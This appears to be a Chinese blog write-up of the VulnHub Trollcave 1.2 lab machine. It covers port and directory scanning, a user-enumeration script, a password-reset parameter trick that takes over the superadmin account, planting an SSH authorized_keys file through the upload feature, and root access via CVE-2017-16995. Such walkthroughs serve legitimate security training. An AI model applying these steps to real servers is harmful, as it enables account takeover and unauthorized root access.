vulnhub靶机练习trollcave

最新推荐文章于 2024-07-12 16:03:08 发布
最新推荐文章于 2024-07-12 16:03:08 发布
阅读量466 收藏
点赞数
分类专栏: 靶机实战笔记 文章标签: 服务器 linux 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_56426046/article/details/127229199
版权

靶机介绍

ttps://www.vulnhub.com/entry/trollcave-12,230/ Name: Trollcave: 1.2 Date release: 21 Mar 2018 Author: David Yates Series: Trollcave Web page: https://davidyat.es/2017/11/27/announcing-trollcave/

只需要读取 root/flag.txt

安装靶机环境的时候注意用virtualbox,网络改成桥接和你的攻击机网络一样,然后取消启用USB设备,不要更改原来的系统设置

攻击机:192.168.1.53

靶机:192.168.1.104

信息收集

主机发现

netdiscover -r 192.168.1.1/24

然后nmap 扫描端口:nmap -sV 192.168.1.104

发现22和80端口

然后gobuster扫描网站目录

 └─# gobuster dir -u http://192.168.1.104/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt

 访问网站192.168.1.104

访问 /admin/ 会自动跳转到 /login /login 是用户登录的登录的页面 第一张图片是网站的文章 可以看到 king 这个账号是超级管理员(superadmin) 网页的右边是其他用户,经访问发线这些用户的称谓有些不一样。经测试用户登录随便一个密码会有提示。

编写脚本 

首先是用户信息的获取 遍历每个用户的用户名和角色

#coding:utf-8
import requests
import re def get_user(id): req = requests.get(url='http://192.168.0.149/users/%s' % (id),timeout=6).text
#match <h1>anybodyhome's page</h1> username=re.search('<h1>(.*?)\'s',req).group(1)
#match "user-info"><b>Superadmin</b>
#userlevel=re.search('>\x0A<b>\x0A(.*?)\x0A</b>',req).group(1) userlevel=re.search('>\s<b>\s(.*?)\s</b>',req).group(1) return username,userlevel
for i in range(0,20): try: username,userlevel = get_user(i)
print(username+','+userlevel) except: None

编写提示脚本 主要是获取登录的提示信息。

编写提示脚本 主要是获取登录的提示信息。

确定源码

查看文章

 

猜测源码rails,github搜索源码

https://github.com/rails/rails 

安装的时候会创建用户 rails 从文章得 网站有一个重置密码的功能 但是没有链接提交
尝试实现password_reset Railscast时语句无效 - passwords - 码客

修改密码

http://192.168.1.104/password_resets/new

修改username为xer 

 设置 xer 的密码后登录之后发现权限不高。上传文件没法使用。

将xer改为King

尝试修改权限为 superadmin king 发现不能重置密码 但是可以 用 xer 重置密码后 用户改为King 即可http://192.168.1.104/password_resets/edit.CX7RYxMgDafbVYW1mUJQmQ?name=King

密码重置成功

 上传文件覆盖

登录之后发现上传文件 但是不允许上传 在控制面板把上传限制打开,这样就可以上传文件。上传php 但是网站不能解释 php 文件,但是发现上传的文件可以上传到其他目录。因为可以试试 rails 用户是否存在如果存在可以上传 authorized_keys 到 rails 用户下的.ssh 就可以免密码登录 ssh

生成ssh秘钥

ssh-keygen -f rails
mv rails.pub authorized_keys

将 authorized_key 上传到/home/rails/.ssh/

 

ssh登录目标

mv rails id_rsa-rails 
chmod 600 id_rsa-rails
ssh -i id_rsa-rails rails@192.168.1.104

交互式shell

/bin/bash -i


提升权限

通过 cat /etc/lsb-release 得出 Ubuntu 的版本

 

 cve-2017-16995 提权

https://www.exploit-db.com/exploits/45010

目标上没有 gcc which gcc 本地编译 gcc cve-2017-16995.c -o cve

已经成功提权到 root

获取 flag.txt

慢也好,步伐小也罢,是往前走就好

 

 

夜yesec
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
2021-06-05trollcave1-2靶机攻击
qq_45290991的博客
06-05 276
一、信息收集 nmap发现开了22-80,wapplzer发现资产信息如下: (御剑扫描的后台) 看一下这个网站有什么东西,,发现不能注册(查看博客password reset可知禁止了重新注册新账户的功能),查看ruby on rails的框架历史漏洞cve-2018-xxx,结果不能利用。。有好几个账户,king(superadmin)、coderguy(admin),cooldude89(主持人),dave(admin),Ian(普通用户),尝试在login界面弱口令爆破账号密码,...
trollcave靶机渗透测试
weixin_49340699的博客
06-28 375
trollcave靶机渗透测试环境工具流程 环境 kali攻击机 IP:192.168.1.105 靶机 IP:192.168.1.103 工具 ssh netdiscover nmap dirb python nc searchsploit 流程 netdiscover对目标网段进行扫描主机发现 namp -sV 192.168.1.103 对端口进行扫描 发现开启了80端口和22端口 dirb对80端口进行目录爆破 扫出来的url都是跳转到一个登陆页面 回到主页发现有一篇关于密码重置的博客 在博
靶机渗透】——VulnHub-trollcave
Kris__zhang的博客
06-16 912
](https://img-blog.csdnimg.cn/20200616100625202.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0tyaXNfX3poYW5n,size_16,color_FFFFFF,t_70)
vulnhub靶机 trollcave-v1-2
witwitwiter的博客
09-03 822
vulnhub靶机 trollcave-v1-2 靶机地址Trollcave: 1.2 ~ VulnHub 目标为 root用户的flag.txt 靶机配置 靶机网卡配置参考我之前的vulnhub靶机 Os-hackNos-1_witwitwiter的博客-CSDN博客 渗透测试 使用nmap进行端口扫描 └─# nmap -sV 192.168.5.136 Starting Nmap 7.91
靶机渗透日记 Trollcave
Anonymous
02-03 360
IP 端口 访问80端口 右侧出现了用户,点击 xer 用户,url栏如下 我们尝试更改 /users/ 后的值,发现此处存在用户遍历,修改成 1 时,用户是 King 为 superadmin 权限,修改成 2 时,用户是 dave 为 admin 有一篇文章提到了关于重置用户密码 访问 192.168.154.134/password_resets 提示不存在,扫描后得到路径 尝试修改用户 king 和 dave 发现修改不成功,提示只能修改普通用户,我们修改 xer 用户,此..
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
trollcave靶场深度总结需要掌握的知识
技术超强的网络安全平台
12-11 827
Linux上传文件时也可以任意的…/这样并不影响 也就是说…/可以非常多到达/目录,跟Windows一样 解决不能shell上传文件的问题 1、gcc xxx.c -o xxx编译一个c文件,也就相当于是exe 2、base64 xxx 切记xxx后面一定要有一个空格 3、复制黏贴后,在shell 中运行vim rr.64 复制内容上去 4、后面直接base64 -d rr.64 > rr就可以了 生成ssh秘钥 ssh-keygen -f rails 其中rails为用户名 mv rails.pub
Vulnhub-Trollcave
wwxxss
02-26 92
这里我用的是我新建的用户进行修改,我们需要访问那个链接,在那个链接后面我们看着还有一个name参数,我们试试可不可以修改为King。爬取完用户后,我们可以注册用户登进去但是由于创建用户权限权限很低,我们无法有其他的操作,因此我们需要去百度一下中间件和框架的漏洞。我们需要修改用户权限最大的用户,那么user=1的用户应该最大为King,我们尝试是否可以修改。寻找相关的IP,因为是靶机,我知道了15是我们攻击的靶机,因此我们开始进行访问其80端口查看。结果是可以的,因此我们修改King的密码登录网页。
Trollcaveb靶机渗透测试
qq_50589021的博客
11-06 643
简介:一个社区论坛网站 “God himself cannot hack this website.” – dragon, site admin 很牛逼的介绍啊!! Trollcave渗透测试案例: 1.了解其功能 主要功能:欢迎导语页面,密码重置,法律宗教 2.发现服务(nmap) 1.发现主机IP nmap -sP 2.发现端口(服务) nmap -sS -O(显示操作系统信息) -P0(无Ping扫描) -n(不进行dns解析) -A nmap -sS -O -P0 -n -A 关于-P0: 无p
渗透测试之靶机试炼(八)
simple___sunny的博客
02-21 1079
靶机简介 靶机地址: https://download.vulnhub.com/trollcave/trollcave-v1-2.ova.torrent 运行环境: VirtualBox 攻击测试机环境 kali win 10 工具简介 nmap dirb python nc 靶机网卡设置 三台虚拟主机在同一局域网即可 作者这里直接将靶机桥接到win 10 和kali虚拟机所在网段。 信息收集 ...
渗透测试之靶机试炼(一)
simple___sunny的博客
01-10 1万+
1
Vulnhub靶机渗透测试实战(一):DC-1(入门)
热门推荐
weixin_41038469的博客
03-11 2万+
关于Vulnhub Vulnhub是一个特别好的渗透测试实战网站,提供了许多带有漏洞的渗透测试虚拟机下载。 新手入门DC-1: 下载地址: https://www.vulnhub.com/entry/dc-1-1,292/ 主机渗透系统: macOS10.13 安装好虚拟机后挂载Virtualbox运行 第一次进行渗透实战演练,打开虚拟机后发现需要登录密码,一脸懵逼。翻查网页上的介绍才知道,就是不...
trollcave解题
weixin_30652879的博客
11-05 120
这是第一次完整地进行模拟渗透,前前后后一共花了一天时间,花了点时间写了个writeup。 博主是个菜鸡,如果有大神看到,请轻喷...... writeup下载:https://hrbeueducn-my.sharepoint.com/:b:/g/personal/cjjlbbe001_hrbeu_edu_cn/EUzurkpLZzxAgg26rc0E_msBBE69XBBbMBSpu...
UWA学堂上新|服务器AOI(Area Of Interest)算法和功能实现
最新发布
UWA—简单优化,优化简单!
07-12 367
基于.NetCore开发MMORPG分布式游戏服务器系列篇6
vulnhub靶机系列:
09-09
关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

夜yesec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值